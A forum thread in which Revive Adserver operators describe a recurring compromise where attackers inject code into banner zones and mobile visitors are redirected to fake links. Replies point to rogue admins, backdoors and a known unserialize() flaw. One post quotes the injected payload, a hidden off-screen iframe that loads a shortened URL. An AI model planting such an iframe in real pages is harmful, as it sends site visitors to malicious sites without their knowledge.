mito22 Posted March 25, 2019 Report Posted March 25, 2019 Hi guys.... I've got the last version of revive.... From about a month.. maybe more.... I've got this issue.... On ZONE (banners) -> ADVANCED I've got someone that put an Iframe line where u put HTML.... also.... all the MOBILE USERS was bombarded of fake links and more.... This link is on my SSH.... virus free obiuvsly... http://www.daidegasforum.com/images2/856/revive-bug-iframe.jpg When I have a alarm by the users... I delete the iframe line and all goes ok.... I've upgraded Revive.... changed password.... but ... ALL THE SAME..... 3-4-5... 10 times per day too.... ANyone got a good idea to eradicate this problem? Thanks. Quote
Ian Posted March 25, 2019 Report Posted March 25, 2019 Any rogue admin users? Why are you so sure there is not backdoor on your server? Quote
mito22 Posted March 25, 2019 Author Report Posted March 25, 2019 38 minutes ago, Ian vM said: Any rogue admin users? Why are you so sure there is not backdoor on your server? Hi Ian... not... appears all ok.... Quote
mito22 Posted March 26, 2019 Author Report Posted March 26, 2019 The exact code they're putting on HTML tabels of the various zone is: <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> There's a possibility to hide or censure part of this to will be inefecctive? Quote
szeidler Posted April 2, 2019 Report Posted April 2, 2019 Have you seen this forum topic: ? This could be related. Quote
nezirus Posted April 27, 2019 Report Posted April 27, 2019 (edited) It is related, see the release notes for Revive 4.2, first fixed security vulnerability. The exploit was active in the wild at least from December 2018, all pointing to the single unguarded unserialize() in adxmlrpc.php . Filtering POST requests was acceptable workaround (as suggested in ). Edited April 27, 2019 by nezirus Quote
RELH Posted February 12, 2021 Report Posted February 12, 2021 this is a security vulnerability that still exists on revive adserver 5.0.5 or higher. revive-adserver can't find a solution, they always blame the other "server ..." I delete rows from the database every day Quote
Ian Posted February 12, 2021 Report Posted February 12, 2021 4 hours ago, RELH said: this is a security vulnerability that still exists on revive adserver 5.0.5 or higher. revive-adserver can't find a solution, they always blame the other "server ..." I delete rows from the database every day Please elaborate ? Quote
RELH Posted February 15, 2021 Report Posted February 15, 2021 (edited) On 2/12/2021 at 10:19 PM, Ian vM said: Veuillez préciser? I have the same problem on the latest version of Revive Adserver, it bothers me. I am on version 5.0.5 even though I am upgrading to a higher version. the problem remains the same. 1 - I clean the addition, the prefix of the tables 2 - updating with new files 3 changing the database password and username 4 - changing the administrator password 5 - the configuration of nginx when I request support for revive adserver. I only have one answer (please update revive adserver) Edited February 15, 2021 by RELH french to english Quote
Ian Posted February 15, 2021 Report Posted February 15, 2021 then there is probably a backdoor placed on your server. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.